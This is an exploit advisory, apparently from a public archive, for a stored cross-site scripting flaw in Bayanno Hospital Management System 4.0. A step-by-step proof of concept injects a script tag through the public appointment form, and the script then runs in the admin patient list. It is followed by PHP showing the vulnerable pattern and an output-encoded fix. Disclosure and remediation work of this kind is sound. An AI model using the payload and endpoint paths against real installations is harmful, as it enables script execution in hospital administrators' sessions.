Bayanno Hospital Management System 4.0 Cross Site Scripting

Bayanno Hospital Management System version 4.0 suffers from a cross site scripting vulnerability.

MD5 | 0b9dd1970fe20aed3bd38b43e3821098

# Exploit Title: Bayanno Hospital Management System 4.0 - Cross-Site Scripting
# Date: 2018-09-05
# Software Link:
# Exploit Author: Gokhan Sagoglu
# Vendor Homepage:
# Version: v4.0
# Live Demo:
# Category: webapps

# 1. Description
# Due to improper handling of user input and a lack of output encoding, unauthenticated users can
# inject malicious script by making an appointment. The injected script runs in the admin panel.

# 2. PoC

- To make an appointment go to: /bayanno/index.php?home/appointment
- Select "New Patient".
- Type <script>alert(1)</script> as name.
- Fill the other fields with proper values.
- Click on the "Book Now" button.
- Go to admin panel and login as admin: /bayanno/index.php?login
- To view patients go to: /bayanno/index.php?admin/patient
- Malicious script will run.
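The defect the description names is the rendering step: a value typed into the public appointment form is stored unchanged and later echoed into the admin patient list as raw HTML. The following PHP is an added example, not Bayanno's code; the function and variable names and the sample record are assumptions. It places the vulnerable rendering pattern beside an output-encoded one and adds an input-side check for the patient name, so the fix can be seen in isolation.

```php
<?php
// Added example, not part of the advisory or the vendor's code.
// All names here are assumptions made for illustration.

// Constructed sample record, shaped like the appointment from the PoC above:
// the "name" field carries the payload an unauthenticated visitor submitted.
$patient = ['name' => '<script>alert(1)</script>', 'phone' => '555-0100'];

// Vulnerable pattern: the stored value is interpolated straight into HTML.
// Whatever was typed into "name" becomes markup in the admin page, which is
// the stored cross-site scripting the description refers to.
function render_row_unsafe(array $p): string {
    return "<tr><td>{$p['name']}</td><td>{$p['phone']}</td></tr>";
}

// Hardened pattern: encode at the output boundary for the HTML text context
// the value lands in. ENT_QUOTES also covers single- and double-quoted
// attribute contexts; the explicit charset keeps encoding predictable.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_row_safe(array $p): string {
    return '<tr><td>' . h($p['name']) . '</td><td>' . h($p['phone']) . '</td></tr>';
}

// Defence in depth on the input side: a patient name never legitimately
// contains angle brackets or markup. Rejecting such input at the form does
// not replace output encoding, but it narrows what reaches the database.
function valid_patient_name(string $name): bool {
    // Letters (any script), combining marks, spaces, dots, apostrophes, hyphens.
    return (bool) preg_match('/^[\p{L}\p{M}\s.\'-]{1,100}$/u', $name);
}

// A restrictive Content-Security-Policy on the admin panel limits what an
// inline script could do even if an encoding bug slipped through.
if (!headers_sent()) {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

echo render_row_unsafe($patient), PHP_EOL;
echo render_row_safe($patient), PHP_EOL;
var_dump(valid_patient_name($patient['name']));
var_dump(valid_patient_name("María O'Neil-Smith"));
```

Run from the command line, the first line of output is the raw markup a browser would execute, the second shows the same record with the angle brackets turned into entities so it renders as literal text, and the two checks show the payload rejected and an ordinary name accepted. The important design point is where the encoding happens: at the moment the value is written into the page, matched to that context, rather than by stripping characters on the way in.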
